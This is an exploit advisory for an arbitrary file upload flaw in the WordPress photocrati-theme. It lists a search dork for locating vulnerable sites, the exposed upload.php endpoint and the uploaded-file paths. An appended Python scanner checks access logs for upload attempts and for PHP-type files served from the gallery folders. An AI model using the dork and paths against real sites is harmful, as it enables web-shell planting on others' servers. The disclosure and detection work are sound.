WordPress photocrati-theme Arbitrary File Upload



// Author : s1puT
// Team : K33P-S1L3NT
// Notif : Ternate Lab Pentesting
// page : https://www.facebook.com/loading.gov
// channel : https://www.youtube.com/channel/UChFMZ01R8Z1mhh2tWc-BddQ
// Greets : QueenAisyah | geek_Defcon | kazutto_kun | Zbyte | Badaki | 1!0N7!N | i.am_geek | Admiral | Kopral
// Special : fb.com/zone.tn.org | fb.com/AnonymousPalestine.vip | Overload Team | fb.com/inj3ct0rs | fb.com/Pirates.Elite.Officiall | fb.com/Exploit4ar |

// Demo : https://www.youtube.com/watch?v=7Vjiys38noI 

// Dork : inurl:/wp-content/themes/photocrati-theme/admin/gallery/
// Exploit : /wp-content/themes/photocrati-theme/admin/gallery/upload.php

// References : http://www.securityfocus.com/bid/68414/info

###############################################################

Proof of Concept

WordPress installed at site.com/ or site.com/wordpress/ :

1. site.com/wp-content/themes/photocrati-theme/admin/gallery/upload.php
2. site.com/wordpress/wp-content/themes/photocrati-theme/admin/gallery/upload.php


Uploaded file location :

1. site.com/wp-content/themes/photocrati-theme/galleries/post-/file-name.jpg
2. site.com/wp-content/themes/photocrati-theme/galleries/post-/thumbnails/file-name.jpg

1. site.com/wordpress/wp-content/themes/photocrati-theme/galleries/post-/file-name.jpg
2. site.com/wordpress/wp-content/themes/photocrati-theme/galleries/post-/thumbnails/file-name.jpg 
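
A defender's check for the paths above, added here as an example and not part of the original advisory: it scans web-server access logs (Combined Log Format assumed) for requests to the upload script and for non-image files served from the gallery directories. The extension lists, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote

# Paths below are the ones listed in the advisory; all else is this example's assumption.
THEME = r"/wp-content/themes/photocrati-theme"
UPLOAD_RE = re.compile(THEME + r"/admin/gallery/upload\.php(?:[/?#]|$)", re.I)
GALLERY_RE = re.compile(THEME + r"/galleries/post-[^/]*/(?:thumbnails/)?([^/?#]+)", re.I)
IMAGE_EXT = {"jpg", "jpeg", "png", "gif"}                    # assumed gallery allow-list
EXEC_EXT = {"php", "php3", "php4", "php5", "phtml", "phar"}  # assumed handler-mapped types
# Combined Log Format: ip ident user [time] "METHOD path proto" status size ...
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ')

def classify(line):
    """Return (ip, time, reason) for a line worth triaging, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ip, when, method, raw_path, status = m.groups()
    path = unquote(raw_path)  # decode %2e-style encoding before checking extensions
    ok = status.startswith("2")
    if UPLOAD_RE.search(path):
        return ip, when, "upload-accepted" if method == "POST" and ok else "upload-probe"
    g = GALLERY_RE.search(path)
    if g and ok:
        exts = g.group(1).lower().split(".")[1:]
        # Flag a non-image final extension, or an executable one anywhere (x.php.jpg).
        if not exts or exts[-1] not in IMAGE_EXT or EXEC_EXT & set(exts):
            return ip, when, "non-image-served"
    return None

def scan(lines):
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log (documentation IP ranges, made-up timestamp).
P = "/wp-content/themes/photocrati-theme"
def _line(ip, method, path, status):
    return f'{ip} - - [01/Jan/2024:00:00:00 +0000] "{method} {path} HTTP/1.1" {status} 0 "-" "-"'
SAMPLE_LOG = [
    _line("198.51.100.7", "GET", P + "/admin/gallery/upload.php", 200),
    _line("198.51.100.7", "POST", "/wordpress" + P + "/admin/gallery/upload.php", 200),
    _line("198.51.100.7", "GET", "/wordpress" + P + "/galleries/post-/file-name.php", 200),
    _line("192.0.2.10", "GET", P + "/galleries/post-/thumbnails/file-name.jpg", 200),
    _line("198.51.100.7", "GET", P + "/galleries/post-/file-name.php.jpg", 200),
    _line("203.0.113.5", "POST", P + "/admin/gallery/upload.php", 404),
]

if __name__ == "__main__":
    for ip, when, reason in scan(SAMPLE_LOG):
        print(f"{when} {ip} {reason}")
```

An "upload-accepted" hit followed by a "non-image-served" hit from the same address is the sequence to escalate first; "upload-probe" alone indicates scanning.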


Source : Ternate Lab Pentesting